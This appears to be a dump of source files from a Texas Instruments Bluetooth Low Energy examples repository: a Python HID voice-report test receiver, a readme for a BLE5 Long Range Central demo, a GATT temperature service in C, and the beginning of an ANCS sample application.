HID_RPT_ID_VOICE_DATA_IN = 11\n\n _VENDOR_IDS = set([HID_RPT_ID_VOICE_START_IN, HID_RPT_ID_VOICE_DATA_IN])\n\n _SEQUENCE_ORDER = ( 1, 9, 17, 25, 33, 41, 49, 57, 65, 73,\n 81, 89, 97, 105, 113, 121, 129, 137, 145, 153,\n 161, 169, 177, 185, 193, 201, 209, 217, 225, 233,\n 241, 249)\n\n _START_REPORT = [4, 0, 0, 0, 0]\n _STOP_REPORT = [0, 0, 0, 0, 0]\n\n class Event(object):\n Start = \"Start\"\n Stop = \"Stop\"\n Data = \"Data\"\n\n def __init__(self, callbackFunction, vendor_id=None, product_id=None):\n self.logger = logging.getLogger(self.__class__.__name__)\n self.logger.info(\"Init\")\n\n HIDTransport.__init__(self,\n callback=self._callback,\n vendor_id=vendor_id,\n product_id=product_id)\n\n self._callbackFxn = callbackFunction\n self._audioData = bytearray()\n self._frameCnt = 0\n self._checkData = False\n self._state = HIDVoHoGP.Event.Stop\n self._sequenceIndex = 1\n self._rawFile = None\n return\n\n def _callback(self, data):\n #self.logger.debug(\"HID Callback: Data: %s\" % data)\n\n if data[0] == HIDVoHoGP.HID_RPT_ID_VOICE_START_IN:\n if data[1:6] == HIDVoHoGP._START_REPORT:\n self.logger.info(\"Start\")\n\n if self._checkData:\n self.__sequenceIndex = 1\n if self._state is not HIDVoHoGP.Event.Stop:\n self.logger.error(\"Received \\\"Start\\\" while in \\\"%s\\\" state!\" % self._state)\n if self._rawFile is not None:\n self._rawFile.close()\n self._rawFile = open(time.strftime(\"raw_%Y-%m-%d_%H-%M-%S\")+\".bin\", \"w\")\n self._rawFile.write(\"ST %02X %s\\n\" % (data[1], data[2:6]))\n\n self._state = HIDLegacy.Event.Start\n\n self._frameCnt = 0\n self._audioData = b''\n\n elif data[1:6] == HIDVoHoGP._STOP_REPORT:\n self.logger.info(\"Stop\")\n\n if self._checkData:\n if self._state is not HIDVoHoGP.Event.Data:\n self.logger.error(\"Received \\\"Data\\\" while in \\\"%s\\\" state!\" % self._state)\n if self._frameCnt != 0:\n self.logger.error(\"Received \\\"Stop\\\" without having all of the audio frames!\")\n self._rawFile.write(\"SP %02X %s\\n\" % (data[1], data[2:6]))\n self._rawFile.close()\n self._rawFile = None\n\n self._state = HIDVoHoGP.Event.Stop\n\n \"\"\" Perform supplied application function callback\"\"\"\n if self._callbackFxn is not None:\n self._callbackFxn(self._audioData)\n else:\n self.logger.error(\"Invalid packet: %s\" % data[1:6])\n self.logger.error(\"Data: %s\" % data)\n raise \"Invalid packet\"\n\n elif data[0] == HIDVoHoGP.HID_RPT_ID_VOICE_DATA_IN:\n #self.logger.debug(\"Data[%d]: %s\" % (self._frameCnt, data[1:21]))\n\n if self._checkData:\n if self._state is HIDVoHoGP.Event.Start and self._frameCnt != 0:\n self.logger.warn(\"Received \\\"Data\\\" where frameCnt is \\\"%d\\\"\" % self._frameCnt)\n\n self._state = HIDVoHoGP.Event.Data\n\n \"\"\" Experimental check for lost voice frames; not yet validated! \"\"\"\n if self._checkData:\n if self._frameCnt == 0:\n if data[1] is not HIDVoHoGP._SEQUENCE_ORDER[self._sequenceIndex]:\n for i, x in enumerate(HIDVoHoGP._SEQUENCE_ORDER):\n if x == data[1]:\n self.logger.debug(\"Found pair: %d, %d\" % (i, x))\n self.logger.debug(\"Expected pair: %d, %d\" % (self._sequenceIndex, HIDVoHoGP._SEQUENCE_ORDER[self._sequenceIndex]))\n\n if i > self._sequenceIndex:\n delta = i - self._sequenceIndex\n else:\n delta = i + len(HIDVoHoGP._SEQUENCE_ORDER) - self._sequenceIndex\n\n self.logger.warn(\"Dropped %d voice frame(s)\" % delta)\n self._sequenceIndex = i\n self.logger.debug(\"Setting index to %d; delta found %d\" % (self._sequenceIndex, delta))\n break\n\n self._sequenceIndex += 1\n if self._sequenceIndex == len(HIDVoHoGP._SEQUENCE_ORDER):\n self._sequenceIndex = 0\n\n string = 'D0 {seqNum:3d} {array:>120}\\n'.format(seqNum=data[1],\n array=', '.join('0x{0:02X}'.format(x) for x in data[5:]))\n else:\n string = 'D{frameCnt} {array:>120}\\n'.format(frameCnt=self._frameCnt,\n array=', '.join('0x{0:02X}'.format(x) for x in data[1:]))\n self._rawFile.write(string)\n\n if self._frameCnt == 0:\n it = iter(data[5:21])\n else:\n it = iter(data[1:21])\n\n for x in it:\n self._audioData += pack('B', x)\n\n self._frameCnt += 1\n if self._frameCnt == 5:\n self._frameCnt = 0\n else:\n raise \"HID Report ID\"\n\n def setDataValidation(self, boolean):\n self._checkData = boolean\n\n\ndef set_debug_level(loggers, formatter):\n\n ch = logging.StreamHandler()\n ch.setFormatter(formatter)\n\n for log in loggers:\n\n logger = logging.getLogger(log)\n\n if \"HIDVoHoGP\" in log:\n logger.setLevel(logging.CRITICAL)\n logger.setLevel(logging.ERROR)\n logger.setLevel(logging.WARNING)\n logger.setLevel(logging.INFO)\n logger.setLevel(logging.DEBUG)\n\n if \"HIDLegacy\" in log:\n logger.setLevel(logging.CRITICAL)\n logger.setLevel(logging.ERROR)\n logger.setLevel(logging.WARNING)\n logger.setLevel(logging.INFO)\n logger.setLevel(logging.DEBUG)\n\n logger.addHandler(ch)\n\n\ndef main():\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n set_debug_level([\"HIDLegacy\", \"HIDVoHoGP\"], formatter)\n\n appLogger = logging.getLogger(\"Test App\")\n appLogger.setLevel(logging.INFO)\n ch = logging.StreamHandler()\n ch.setFormatter(formatter)\n appLogger.addHandler(ch)\n\n def testfunction(data):\n appLogger.info(\"Test Callback with %s bytes\" % len(data))\n\n #hid = HIDLegacy(testfunction, vendor_id=0x000d, product_id=0x0000)\n hid = HIDVoHoGP(testfunction, vendor_id=0x000d, product_id=0x0000)\n hid.setDataValidation(True)\n hid.open()\n\n while hid.isConnected():\n sleep(1)\n\n hid.close()\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.7145828008651733,
"alphanum_fraction": 0.732778787612915,
"avg_line_length": 31.601694107055664,
"blob_id": "f278bd385339e56d1ab6a3bcf6565856cf881a16",
"content_id": "85a10e45fd9bab2a0b7858b0079126ae8c6e871d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3847,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 118,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_central/readme.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "# BLE5-Stack Long Range Central\n\n## Functional Overview\n\nThis example page will demonstrate the Bluetooth™ 5 Long Range\ncapabilities of the Texas Instruments CC2640R2 SDK's BLE5-Stack.\n\nThis project is a modified Simple Central sample application from the\nBLE5-Stack component of the SDK.\n\nThis list contains the changes from the standard Simple Central example:\n- Removed the Simple GATT Profile\n- Added Support for a custom profile called Throughput Profile\n- Added Support for a custom profile called Temperature Profile\n - Based on the [Sensor Tag's Temperature profile](http://processors.wiki.ti.com/index.php/CC2650_SensorTag_User's_Guide#IR_Temperature_Sensors)\n\nThe Long Range Central only connects to peripherals that support the Throughput\nand Temperature profiles. To connect, the Central and Peripheral devices must be\nwithin the 1M PHY range. Once connected, the Central takes the follow steps:\n\n1. The discovery of the Throughput and Temperature Characteristics\n1. A GATT write to the Throughput PHY Characteristic to have the peripheral\n start negotiation the use of the Coded PHY (S8).\n1. Update the LED status indicating that the Central is connected to the\n Peripheral.\n1. Enabling GATT Notifications for the Temperature Data Characteristic\n\n## Project Hardware\n- 1 CC2650R2 Launchpad\n- 1 UART Terminal on PC\n\n### LED Output\n\n- RED: Solid RED indicates the device is not connected to a peripheral.\n- GREEN: Blinking GREEN indicates the device is connected to a peripheral in\n using the Long Range Coded PHY (S8).\n\n### Two Button Menu\n\nThe Two Button Menu system is designed to utilize the two push buttons available\non the CC2640R2 Launchpad. The left button (BTN1) is always used to cycle\nbetween options. The right button (BTN2) is used to activate the selected action\nor item.\n\nThe Two Button Menu is set up by default to utilize the back channel UART\npresent on the Launchpad as it's display.\n\n### Running the Demo\n\n1. Compile and load the projects:\n - First build and load `ble5_longrange_central_cc2640r2lp_stack`\n - Next build and load `ble5_longrange_central_cc2640r2lp_app`\n\n1. Connect to the Launchpad via PuTTY (or other serial console emulator). For\n instructions on connecting via PuTTY, please see our [FAQ page](faq.md).\n\n1. After connecting to PuTTY, you will be presented with the Two Button Menu\n system prompting you for actions. Select 'Scan/Connect Menu' by pressing the\n right button (BTN2).\n\n ```\n *Texas Instruments Bluetooth 5 Long Range Demo\n\n +Scan/Connect Menu >\n\n This Device's BDADDR : 0x<BDADDR>\n ```\n\n1. Then select \"Scan For Devices\" menu option by pressing the right button (BTN2).\n\n ```\n *Scan/Connect Menu\n < Next Item\n Scan for Devices >\n +Upper Menu\n This Device's BDADDR : 0x<BDADDR>\n ```\n\n1. After Scanning is performed, choose the desired device to connect to by\n pressing the right button (BTN2). Note: Only peripherals that support both\n the Throughput and Temperature profiles will be listed.\n\n ```\n *Scan/Connect Menu\n < Next Item\n Select Next Device >\n Connect to Selected Device\n Scan for Devices\n +Upper Menu\n 2 Devices Found\n\n Scanned Device 1\n 0x<BDADDR>\n ```\n\n1. Press the left button (BTN1) to move to the next action, \"Connect to\n Selected Device\". Then use the right button (BTN2) to begin connecting to\n the displayed device.\n\n After a connection is successful, you will be presented with new menu\n options:\n\n ```\n *Texas Instruments Bluetooth 5 Long Range Demo\n < Next Item\n Toggle RSSI Readings\n Disconnect\n PHY Update Complete\n ```\n\n As well as connection details in the UART display:\n\n ```\n Peer Device : 0x<BDADDR>\n Current PHY: Coded:S8\n RSSI -dBm: 65\n Object Temperature: 22 (C)\n ```\n"
},
{
"alpha_fraction": 0.5890128016471863,
"alphanum_fraction": 0.5943824648857117,
"avg_line_length": 31.218631744384766,
"blob_id": "191aa7df65d7e61430ea221d0428d3bb8ff4dfbd",
"content_id": "40f85da3baf9a5acdc130f9057a34139e36ce53c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 16947,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 526,
"path": "/source/ti/ble5stack/profiles/temperature/temperature_service.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (c) 2017, Texas Instruments Incorporated\n * All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n *\n * * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n * THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n */\n/*\n * ======== temperature_service.c ========\n */\n\n\n\n/*********************************************************************\n * INCLUDES\n */\n#include <string.h>\n\n#include \"bcomdef.h\"\n#include \"OSAL.h\"\n#include \"linkdb.h\"\n#include \"att.h\"\n#include \"gatt.h\"\n#include \"gatt_uuid.h\"\n#include \"gattservapp.h\"\n#include \"gapbondmgr.h\"\n\n#include \"temperature_service.h\"\n\n/*********************************************************************\n * MACROS\n */\n\n/*********************************************************************\n * CONSTANTS\n */\n\n/*********************************************************************\n * TYPEDEFS\n */\n\n/*********************************************************************\n* GLOBAL VARIABLES\n*/\n\n//! UUID for the GATT Primary Service Declaration\nconst uint8_t temperature_service_uuid[ATT_UUID_SIZE] =\n{\n TI_BASE_UUID_128(TEMPERATURE_SERVICE_SERV_UUID)\n};\n\n// Update_PDU UUID\nconst uint8_t temperature_service_data_uuid[ATT_UUID_SIZE] =\n{\n TI_BASE_UUID_128(TEMPERATURE_SERVICE_DATA_UUID)\n};\n// Update_PHY UUID\nconst uint8_t temperature_service_config_uuid[ATT_UUID_SIZE] =\n{\n TI_BASE_UUID_128(TEMPERATURE_SERVICE_CONFIG_UUID)\n};\n// Toggle_Temperature UUID\nconst uint8_t temperature_service_period_uuid[ATT_UUID_SIZE] =\n{\n TI_BASE_UUID_128(TEMPERATURE_SERVICE_PERIOD_UUID)\n};\n\n/*********************************************************************\n * LOCAL VARIABLES\n */\n\nstatic Temperature_ServiceCBs_t *pAppCBs = NULL;\n\n/*********************************************************************\n* Profile Attributes - variables\n*/\n\n// Service declaration\nstatic const gattAttrType_t temperature_serviceDecl = { ATT_UUID_SIZE, temperature_service_uuid };\n\n// Characteristic \"Data\" Properties (for declaration)\nstatic uint8_t temperature_service_data_props = GATT_PROP_READ | GATT_PROP_NOTIFY;\nstatic uint8_t temperature_service_data_val[TEMPERATURE_SERVICE_DATA_LEN] = {0};\nstatic gattCharCfg_t *temperature_service_data_cccd; //This characteristic is notifiable!\n\n// Characteristic \"Config\" Properties (for declaration)\nstatic uint8_t temperature_service_config_props = GATT_PROP_READ | GATT_PROP_WRITE;\nstatic uint8_t temperature_service_config_val[TEMPERATURE_SERVICE_CONFIG_LEN] = {0};\n\n// Characteristic \"Period\" Properties (for declaration)\nstatic uint8_t temperature_service_period_props = GATT_PROP_READ | GATT_PROP_WRITE;\nstatic uint8_t temperature_service_period_val[TEMPERATURE_SERVICE_PERIOD_LEN] = {0};\n\n/*********************************************************************\n* Profile Attributes - Table\n*/\n\nstatic gattAttribute_t temperature_serviceAttrTbl[] =\n{\n // Temperature_Service Service Declaration\n {\n { ATT_BT_UUID_SIZE, primaryServiceUUID },\n GATT_PERMIT_READ,\n 0,\n (uint8_t *)&temperature_serviceDecl\n },\n // Data Characteristic Declaration\n {\n { ATT_BT_UUID_SIZE, characterUUID },\n GATT_PERMIT_READ,\n 0,\n &temperature_service_data_props\n },\n // Data Characteristic Value\n {\n { ATT_UUID_SIZE, temperature_service_data_uuid },\n GATT_PERMIT_READ,\n 0,\n temperature_service_data_val\n },\n\n // Characteristic Configuration\n {\n { ATT_BT_UUID_SIZE, clientCharCfgUUID },\n GATT_PERMIT_READ | GATT_PERMIT_WRITE,\n 0,\n (uint8 *)&temperature_service_data_cccd\n },\n\n // Config Characteristic Declaration\n {\n { ATT_BT_UUID_SIZE, characterUUID },\n GATT_PERMIT_READ,\n 0,\n &temperature_service_config_props\n },\n // Config Characteristic Value\n {\n { ATT_UUID_SIZE, temperature_service_config_uuid },\n GATT_PERMIT_READ | GATT_PERMIT_WRITE,\n 0,\n temperature_service_config_val\n },\n // Period Characteristic Declaration\n {\n { ATT_BT_UUID_SIZE, characterUUID },\n GATT_PERMIT_READ,\n 0,\n &temperature_service_period_props\n },\n // Period Characteristic Value\n {\n { ATT_UUID_SIZE, temperature_service_period_uuid },\n GATT_PERMIT_READ | GATT_PERMIT_WRITE,\n 0,\n temperature_service_period_val\n },\n};\n\n/*********************************************************************\n * LOCAL FUNCTIONS\n */\nstatic bStatus_t Temperature_Service_ReadAttrCB( uint16 connHandle,\n gattAttribute_t *pAttr, uint8 *pValue, uint16 *pLen, uint16 offset,\n uint16 maxLen, uint8 method );\nstatic bStatus_t Temperature_Service_WriteAttrCB( uint16 connHandle,\n gattAttribute_t *pAttr, uint8 *pValue, uint16 len, uint16 offset,\n uint8 method );\n\n/*********************************************************************\n * PROFILE CALLBACKS\n */\n// Simple Profile Service Callbacks\nconst gattServiceCBs_t Temperature_ServiceCBs =\n{\n Temperature_Service_ReadAttrCB, // Read callback function pointer\n Temperature_Service_WriteAttrCB, // Write callback function pointer\n NULL // Authorization callback function pointer\n};\n\n/*********************************************************************\n* PUBLIC FUNCTIONS\n*/\n\n/*\n * Temperature_Service_AddService- Initializes the Temperature_Service service by registering\n * GATT attributes with the GATT server.\n *\n */\nbStatus_t Temperature_Service_AddService( void )\n{\n uint8_t status;\n\n temperature_service_data_cccd =\n (gattCharCfg_t *)ICall_malloc( sizeof(gattCharCfg_t) * linkDBNumConns );\n\n if ( temperature_service_data_cccd == NULL )\n {\n return ( bleMemAllocError );\n }\n\n // Initialize Client Characteristic Configuration attributes\n GATTServApp_InitCharCfg( INVALID_CONNHANDLE, temperature_service_data_cccd );\n\n // Register GATT attribute list and CBs with GATT Server App\n status = GATTServApp_RegisterService( temperature_serviceAttrTbl,\n GATT_NUM_ATTRS( temperature_serviceAttrTbl ),\n GATT_MAX_ENCRYPT_KEY_SIZE,\n &Temperature_ServiceCBs );\n\n return ( status );\n}\n\n/*\n * Temperature_Service_RegisterAppCBs - Registers the application callback function.\n * Only call this function once.\n *\n * appCallbacks - pointer to application callbacks.\n */\nbStatus_t Temperature_Service_RegisterAppCBs(\n Temperature_ServiceCBs_t *appCallbacks )\n{\n if ( appCallbacks )\n {\n pAppCBs = appCallbacks;\n\n return ( SUCCESS );\n }\n else\n {\n return ( bleAlreadyInRequestedMode );\n }\n}\n\n/*\n * Temperature_Service_SetParameter - Set a Temperature_Service parameter.\n *\n * param - Profile parameter ID\n * len - length of data to right\n * value - pointer to data to write. This is dependent on\n * the parameter ID and WILL be cast to the appropriate\n * data type (example: data type of uint16 will be cast to\n * uint16 pointer).\n */\nbStatus_t Temperature_Service_SetParameter( uint8 param, uint8 len,\n void *value )\n{\n bStatus_t ret = SUCCESS;\n switch ( param )\n {\n case TEMPERATURE_SERVICE_DATA:\n if ( len == TEMPERATURE_SERVICE_DATA_LEN )\n {\n memcpy(temperature_service_data_val, value, len);\n\n // See if Notification has been enabled\n ret = GATTServApp_ProcessCharCfg( temperature_service_data_cccd,\n temperature_service_data_val,\n FALSE,\n temperature_serviceAttrTbl,\n GATT_NUM_ATTRS( temperature_serviceAttrTbl ),\n INVALID_TASK_ID,\n Temperature_Service_ReadAttrCB );\n }\n else\n {\n ret = bleInvalidRange;\n }\n break;\n\n case TEMPERATURE_SERVICE_CONFIG:\n if ( len == TEMPERATURE_SERVICE_CONFIG_LEN )\n {\n memcpy(temperature_service_config_val, value, len);\n }\n else\n {\n ret = bleInvalidRange;\n }\n break;\n\n case TEMPERATURE_SERVICE_PERIOD:\n if ( len == TEMPERATURE_SERVICE_PERIOD_LEN )\n {\n memcpy(temperature_service_period_val, value, len);\n }\n else\n {\n ret = bleInvalidRange;\n }\n break;\n\n default:\n ret = INVALIDPARAMETER;\n break;\n }\n return ret;\n}\n\n\n/*\n * Temperature_Service_GetParameter - Get a Temperature_Service parameter.\n *\n * param - Profile parameter ID\n * value - pointer to data to write. This is dependent on\n * the parameter ID and WILL be cast to the appropriate\n * data type (example: data type of uint16 will be cast to\n * uint16 pointer).\n */\nbStatus_t Temperature_Service_GetParameter( uint8 param, void *value )\n{\n bStatus_t ret = SUCCESS;\n switch ( param )\n {\n case TEMPERATURE_SERVICE_DATA:\n memcpy(value, temperature_service_data_val,\n TEMPERATURE_SERVICE_DATA_LEN);\n break;\n\n case TEMPERATURE_SERVICE_CONFIG:\n memcpy(value, temperature_service_config_val,\n TEMPERATURE_SERVICE_CONFIG_LEN);\n break;\n\n case TEMPERATURE_SERVICE_PERIOD:\n memcpy(value, temperature_service_period_val,\n TEMPERATURE_SERVICE_PERIOD_LEN);\n break;\n\n default:\n ret = INVALIDPARAMETER;\n break;\n }\n return ret;\n}\n\n\n/*********************************************************************\n * @fn Temperature_Service_ReadAttrCB\n *\n * @brief Read an attribute.\n *\n * @param connHandle - connection message was received on\n * @param pAttr - pointer to attribute\n * @param pValue - pointer to data to be read\n * @param pLen - length of data to be read\n * @param offset - offset of the first octet to be read\n * @param maxLen - maximum length of data to be read\n * @param method - type of read message\n *\n * @return SUCCESS, blePending or Failure\n */\nstatic bStatus_t Temperature_Service_ReadAttrCB( uint16 connHandle,\n gattAttribute_t *pAttr, uint8 *pValue, uint16 *pLen, uint16 offset,\n uint16 maxLen, uint8 method )\n{\n bStatus_t status = SUCCESS;\n\n // See if request is regarding the Update_PDU Characteristic Value\n if ( ! memcmp(pAttr->type.uuid, temperature_service_data_uuid, pAttr->type.len) )\n {\n // Prevent malicious ATT ReadBlob offsets.\n if ( offset > TEMPERATURE_SERVICE_DATA_LEN )\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n // Transmit as much as possible\n *pLen = MIN(maxLen, TEMPERATURE_SERVICE_DATA_LEN - offset);\n memcpy(pValue, pAttr->pValue + offset, *pLen);\n }\n }\n // See if request is regarding the Update_PHY Characteristic Value\n else if ( ! memcmp(pAttr->type.uuid, temperature_service_config_uuid, pAttr->type.len) )\n {\n // Prevent malicious ATT ReadBlob offsets.\n if ( offset > TEMPERATURE_SERVICE_CONFIG_LEN )\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n // Transmit as much as possible\n *pLen = MIN(maxLen, TEMPERATURE_SERVICE_CONFIG_LEN - offset);\n memcpy(pValue, pAttr->pValue + offset, *pLen);\n }\n }\n // See if request is regarding the Toggle_Temperature Characteristic Value\n else if ( ! memcmp(pAttr->type.uuid, temperature_service_period_uuid, pAttr->type.len) )\n {\n // Prevent malicious ATT ReadBlob offsets.\n if ( offset > TEMPERATURE_SERVICE_PERIOD_LEN )\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n // Transmit as much as possible\n *pLen = MIN(maxLen, TEMPERATURE_SERVICE_PERIOD_LEN - offset);\n memcpy(pValue, pAttr->pValue + offset, *pLen);\n }\n }\n else\n {\n /*\n * If we get here, that means you've forgotten to add an if clause for a\n * characteristic value attribute in the attribute table that has READ\n * permissions.\n */\n *pLen = 0;\n status = ATT_ERR_ATTR_NOT_FOUND;\n }\n\n return status;\n}\n\n\n/*********************************************************************\n * @fn Temperature_Service_WriteAttrCB\n *\n * @brief Validate attribute data prior to a write operation\n *\n * @param connHandle - connection message was received on\n * @param pAttr - pointer to attribute\n * @param pValue - pointer to data to be written\n * @param len - length of data\n * @param offset - offset of the first octet to be written\n * @param method - type of write message\n *\n * @return SUCCESS, blePending or Failure\n */\nstatic bStatus_t Temperature_Service_WriteAttrCB( uint16 connHandle,\n gattAttribute_t *pAttr, uint8 *pValue, uint16 len, uint16 offset,\n uint8 method )\n{\n bStatus_t status = SUCCESS;\n uint8_t paramID = 0xFF;\n\n // See if request is regarding a Client Characterisic Configuration\n if ( ! memcmp(pAttr->type.uuid, clientCharCfgUUID, pAttr->type.len) )\n {\n // Allow only notifications.\n status = GATTServApp_ProcessCCCWriteReq( connHandle, pAttr, pValue, len,\n offset, GATT_CLIENT_CFG_NOTIFY);\n }\n // See if request is regarding the Update_PHY Characteristic Value\n else if ( ! memcmp(pAttr->type.uuid, temperature_service_config_uuid, pAttr->type.len) )\n {\n if ( offset + len > TEMPERATURE_SERVICE_CONFIG_LEN )\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n // Copy pValue into the variable we point to from the attribute table.\n memcpy(pAttr->pValue + offset, pValue, len);\n\n // Only notify application if entire expected value is written\n if ( offset + len == TEMPERATURE_SERVICE_CONFIG_LEN)\n paramID = TEMPERATURE_SERVICE_CONFIG;\n }\n }\n // See if request is regarding the Toggle_Temperature Characteristic Value\n else if ( ! memcmp(pAttr->type.uuid, temperature_service_period_uuid, pAttr->type.len) )\n {\n if ( offset + len > TEMPERATURE_SERVICE_PERIOD_LEN )\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n // Copy pValue into the variable we point to from the attribute table.\n memcpy(pAttr->pValue + offset, pValue, len);\n\n // Only notify application if entire expected value is written\n if ( offset + len == TEMPERATURE_SERVICE_PERIOD_LEN)\n paramID = TEMPERATURE_SERVICE_PERIOD;\n }\n }\n else\n {\n /*\n * If we get here, that means you've forgotten to add an if clause for a\n * characteristic value attribute in the attribute table that has WRITE\n * permissions.\n */\n status = ATT_ERR_ATTR_NOT_FOUND;\n }\n\n // Let the application know something changed (if it did) by using the\n // callback it registered earlier (if it did).\n if (paramID != 0xFF)\n {\n if ( pAppCBs && pAppCBs->pfnChangeCb )\n {\n // Call app function from stack task context.\n pAppCBs->pfnChangeCb( paramID );\n }\n }\n return status;\n}\n"
},
{
"alpha_fraction": 0.618738055229187,
"alphanum_fraction": 0.631014883518219,
"avg_line_length": 29.66195297241211,
"blob_id": "df809e762e1eb37ed96421f02217e7230c984be0",
"content_id": "1819df105ac49a734f9226cde29c551a19406487",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 45533,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 1485,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/bleapps/ancs/src/app/ancs.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/******************************************************************************\n\n @file ancs.c\n\n @brief This file contains the ANCS Application sample application for use\n with the CC2640R2 Bluetooth Low Energy Protocol Stack.\n\n Group: CMCU, SCS\n Target Device: CC2640R2\n\n ******************************************************************************\n\n Copyright (c) 2013-2017, Texas Instruments Incorporated\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions\n are met:\n\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n * Neither the name of Texas Instruments Incorporated nor the names of\n its contributors may be used to endorse or promote products derived\n from this software without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *****************************************************************************/\n\n\n/*********************************************************************\n * INCLUDES\n */\n#include \"string.h\"\n#include \"bcomdef.h\"\n#include <ti/display/Display.h>\n#include \"Board.h\"\n#include \"ancs.h\"\n#include \"ancs_app.h\"\n#include \"icall_ble_api.h\"\n\n\n/*********************************************************************\n * CONSTANTS\n */\n\n#define NOTIF_ATTR_REQUEST_METADATA_LENGTH 0x08\n#define DATA_BUFFER_SIZE 100\n\n#define REQUESTED_ATTR_ID_APPID 0x01\n#define REQUESTED_ATTR_ID_DS 0x02\n#define REQUESTED_ATTR_ID_TITLE 0x04\n#define REQUESTED_ATTR_ID_SUBTITLE 0x08\n#define REQUESTED_ATTR_ID_MESSAGE 0x10\n#define REQUESTED_ATTR_ID_MESSAGE_SIZE 0x20\n#define REQUESTED_ATTR_ID_DATE 0x40\n\n\n#define ATTR_APPID_REQUEST_SIZE 0\n#define ATTR_TITLE_REQUEST_SIZE 20\n#define ATTR_SUBTITLE_REQUEST_SIZE 30\n#define ATTR_MESSAGE_REQUEST_SIZE DATA_BUFFER_SIZE - 1\n#define ATTR_MESSAGE_SIZE_REQUEST_SIZE 0\n#define ATTR_DATE_REQUEST_SIZE 0\n\n\n/*********************************************************************\n * TYPEDEFS\n */\n\ntypedef struct\n{\n uint8_t categoryID;\n uint8_t notificationUID[4];\n uint8_t currentState;\n uint8_t requestedAttrs;\n} notifQueueData_t;\n\ntypedef struct notifQueueNode_t\n{\n notifQueueData_t notifData;\n struct notifQueueNode_t *pNext;\n} notifQueueNode_t;\n\n\n/*********************************************************************\n * GLOBAL VARIABLES\n */\n// Stores the connection handle to the iPhone.\nuint16_t Ancs_connHandle;\n\n// Stores the state of the Data Source GATT notification processing function (Ancs_processDataServiceNotif()).\nuint8_t notifAttrPktProcessState;\n\n// Stores the state of the Data Source GATT notification processing function (Ancs_processAppAttr()).\nuint8_t appAttrPktProcessState;\n/*********************************************************************\n * LOCAL VARIABLES\n */\n\n// Used to stored the retrieved attribute data.\nstatic uint8_t dataBuf[DATA_BUFFER_SIZE] = { '\\0' };\n\n// Stores the length of the retrieved attribute data.\nstatic uint16_t dataLen = 0x0000;\n\n// Stores the notification ID of the head of the queue.\nstatic uint8_t currentNotifUID[ANCS_NOTIF_UID_LENGTH] = { 0x00 };\nstatic uint8_t 